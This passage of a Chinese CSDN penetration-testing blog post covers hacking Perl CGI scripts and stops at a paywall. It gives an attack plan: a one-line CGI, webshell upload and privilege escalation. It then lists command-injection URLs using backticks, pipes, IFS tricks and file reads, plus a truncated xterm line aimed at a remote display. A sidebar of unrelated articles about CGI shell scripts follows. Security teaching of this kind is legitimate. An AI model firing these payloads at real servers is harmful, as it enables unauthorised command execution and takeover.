CGI Hack 实现在HTML页面执行Shell命令

最新推荐文章于 2023-07-05 20:41:27 发布
最新推荐文章于 2023-07-05 20:41:27 发布
阅读量873 收藏
点赞数
分类专栏: 全栈网络安全 渗透测试 代码审计 网络安全工具开发 文章标签: 前端 服务器 servlet
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35029061/article/details/126094535
版权

总体思路,跳过限制,查看敏感文件和密码相关文件。

写入一句话cgi,进后台试传webshell(如果后台加验证或者MD5的时候,可以试着cookies欺骗、本地提交),寻找可执行的目录和相关函数,拿shell>提权   

一、Perl 手工注入

Perl脚本的漏洞大多出在open()、system()或者 ’’调用中,前者允许读写和执行,而后两个允许执行。   

以POST的方法发送表格的话,就不能蒙混过关(%00将不会被解析),所以我们大部分用GET。  

http://target.com/cgi-bin/home/news/sub.pl?12 随意构造  
http://target.com/cgi-bin/home/news/sub.pl?& 换个字符,也许可以执行呢  
http://target.com/cgi-bin/home/news/sub.pl?`ls` 单引号  
http://target.com/cgi-bin/home/news/sub.pl?`id`  
http://target.com/cgi-bin/home/news/sub.pl?`IFS=!;uname!-a`  
http://target.com/cgi-bin/home/news/sub.pl?`cat<’/home1/siteadm/cgi-bin/home/news/sub.pl’` 非常好的思路,把代码cat回来显示  

http://target.com/test.pl;ls|  
http://target.com/index.cgi?page=|ls+-la+/%0aid%0awhich+xterm|  
http://target.com/index.cgi?page=|xterm+-isplay+10.0.1.
了解本专栏 订阅专栏 解锁全文 超级会员免费看
wespten
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
shell2http:通过HTTP服务器执行shell命令
01-30
HTTP服务器执行Shell命令。 专为开发,原型制作或远程控制而设计。 通过两个命令行参数path和shell命令进行设置。 默认情况下绑定到:8080。 用法 shell2http [options] /path "shell command" /path2 "shell ...
浏览器中执行shell命令
最新发布
wyx的博客
05-16 527
我们平常执行linux的脚本是xshell工具连接服务器后,在去linux上执行,但是账号密码给到客户的时候权限不高,导致有些需要提权的命令无法执行,我就想着能否将用户常用的命令做个网站的形式点击执行
html5执行shell,利用nginx执行Shell 脚本
weixin_39807954的博客
06-16 619
通过远程url调用首先自行安装openresty,不做介绍了就.假如我们安装路径为:/southtv/openresty1 首先安装sockprocgit clone https://github.com/juce/sockproccd sockprocmake./sockproc /tmp/shell.sockchmod 0666 /tmp/shell.socksockproc 是一个服务器程序...
html页面执行shell,经过CGI实如今Html页面执行shell命令
weixin_42498055的博客
06-04 977
在mac上配置cgi(不用系统自带的apache cgi.)安装cgi1. brew update2. brew install httpd24安装完后,会有以下提示htmlDocumentRoot is /usr/local/var/www.shellThe default ports have been set in /usr/local/etc/httpd/httpd.conf to 808...
html5执行shell,source命令 – 在当前Shell环境中从指定文件读取和执行命令
weixin_36090062的博客
07-04 474
source命令(从 C Shell 而来)是bash shell的内置命令。点命令,就是个点符号,(从Bourne Shell而来)是source的另一名称。 source命令通常用于重新执行刚修改的初始化文件,使之立即生效,而不必注销并重新登录。source返回文件最后一个命令的返回值,如果文件不能读取则会失败。语法格式:source [文件]参考实例读取和执行/root/.bash_prof...
html如何调用shell脚本,使用shell脚本发送HTML邮件
weixin_31212247的博客
06-04 1317
首先,您需要撰写邮件。裸最小值由这两个头组成:MIME-Version: 1.0Content-Type: text/html…和适当的消息体:Hello, world!一旦你拥有它,你可以传递适当的信息到mail命令:body = '...'echo $body | mail \-a "From: me@example.com" \-a "MIME-Version: 1.0" \-a "Cont...
Linux基础+html和script一些基本语法
Cosmoshhhyyy的博客
07-05 916
不要写成background-color,margin-left就行。transform:rotate(30deg) 旋转30度。后面每三个为一组,一共有三组,分别表示三种用户对其的权限。VM-16-10-centos 服务器名字。普通文件 文件主 组用户 其他用户。etc 文件夹,相当于windows上。~ linux操作系统上的用户目录。也可以改变透明度,周期,边距等。ls -a 隐藏内容也列举。margin-left 左边距。表示为3000毫秒后触发m1。,进入控制台,可得到结果。
通过HTML调用CGI指令,从C到Web
10-12
这个“通过HTML调用CGI指令,从C到Web”的示例演示了如何使用HTML页面来触发CGI程序,从而与后端C语言编写的程序进行交互,实现实时反馈电控板的状态。 首先,让我们深入了解一下CGICGI允许Web服务器运行外部程序...
cgi.rar_cgi_cgi common gate_cgi html
09-21
CGI为开发者提供了一种方式,使得Web服务器可以调用外部程序来处理用户的请求,从而实现网页的动态化。 CGI的基本工作原理是:当用户通过浏览器发送一个HTTP请求到Web服务器时,服务器接收到请求后,会启动一个CGI...
XML.rar_html页面查询_sql-cgi_xml局限?
09-22
如果要想把有用的信息从数据库中提取出来,传统的方法是在服务器端编写脚本程序(如VBScript、JavaScript、CGI、ASP、Perl等等),通过对数据库执行SQL查询得到相关记录,然后把查询结果组织成HTML页面返回给客户端,...
cgi_sql2.tar.gz_cgi_cgi html
09-19
CGI(Common Gateway Interface,通用网关接口)是一种标准,允许Web服务器与外部应用程序进行交互,从而扩展了静态HTML页面的功能。在标题“cgi_sql2.tar.gz_cgi_cgi html”中,我们可以推断这个压缩包包含了一个或...
使用shellcgi,并获取html传递的参数
01-23 7879
from http://linuxaria.com/article/bash-cgi? Sometimes it can be useful with a simple CGI to show the contents of a directory, or run a command with some parameters. If you are a progra
使用 SHELL 实现CGI
wy
05-24 1087
通用网关接口 Common Gateway Interface # CGI是Web服务器和外部程序之间的一个接口 # 利用CGI程序可以处理从客户端发送出来的表单和数据并对此做出相关操作。这种反应可以是HTML、图片、声音、视频等可以在浏览器窗体上出现的任何数据 # 通用网关接口有两个含义: # 1.首先它为客户端用户通过www获取Internet上的其他服务,例如Archie、WAIS、Database等提供了一个接口 # 虽然不能直接在www上访问这些服务,但是可以通过CGI程序和Web服务器访问它们
WEB页面执行shell命令
Jun626的博客
01-12 2287
无法执行复杂的脚本命令,如带有" |等特殊符号的命令无法执行,如yum、top命令执行结果不完整、仅适用于简单带输出脚本命令,脚本运行账号为apache。限制用户访问cgi-bin目录,修改/etc/httpd/conf/httpd.conf。5.cgi-bin目录执行shell脚本格式。配置http页面账号密码访问,也可实现安全性。上面是我的微信和QQ群,欢迎新朋友的加入。注意修改代码中ip,更改为服务器ip或域名。记得给执行权限,chmod a+x *需要配置一下apache2。测试:在浏览器中输入。
html中显示shell脚本的输出,网页从shell脚本中输入并显示结果
weixin_27964579的博客
06-20 1025
首先,不是在BASH脚本中使用$USERNAME。 $USERNAME是一个包含当前用户名的BASH变量。实际上,在BASH中使用UPPERCASE变量通常是一个糟糕的主意。大多数BASH环境变量都是大写字母,可能会导致混淆。让你的变量小写是个好习惯。此外,因为我想你想要使用HTML表单来做到这一点,所以你不能让BASH从STDIN中读取数据。修改游脚本以将用户名作为参数:BASH:#!/bin/...
cgi处理shell
小猪观察员的博客
01-25 878
shell
linux常用命令-03-系统管理
m0_47298981的博客
10-13 235
shutdown: 关机或者重启的命令 //一分钟之后关机 [root@leitingyan ~]# shut down -r +1 //现在立刻马上关机 [root@leitingyan ~]# shut down -r now whoami: 查看当前系统的用户是谁 [root@leitingyan ~]# whoami root [root@leitingyan ~]# ps -ef 查看进程 kill: 杀死某个进程 (1)kill -9:强制杀死进程 [root@leitingyan ~]
通过CGI实现在Web页面执行shell命令
hjw1314kl的博客
11-25 3860
通过CGI实现在Web页面执行shell命令 实验环境: 腾讯云服务器centos7 Apache-httpd的安装: 使用命令安装 yum install httpd命令安装 yum install httpd #安装成功我们可以看到在/var/目录下会产生一个www的目录,该目录下还包含/cgi-bin/ /html/连个目录 cgi-bin目录下主要存放cgi文件 html目录下主要...
shell写一个thttpd-cgi接口实现这样一个功能:能清空网页内容
06-09
好的,我可以帮你用 Shell 编写一个实现清空网页内容的 thttpd-cgi ...现在,当你访问 `http://<服务器IP>/cgi-bin/clear.sh` 时,就会执行上述 Shell 脚本,清空网页内容,并在页面上显示“网页内容已清空”的文字。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

wespten

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值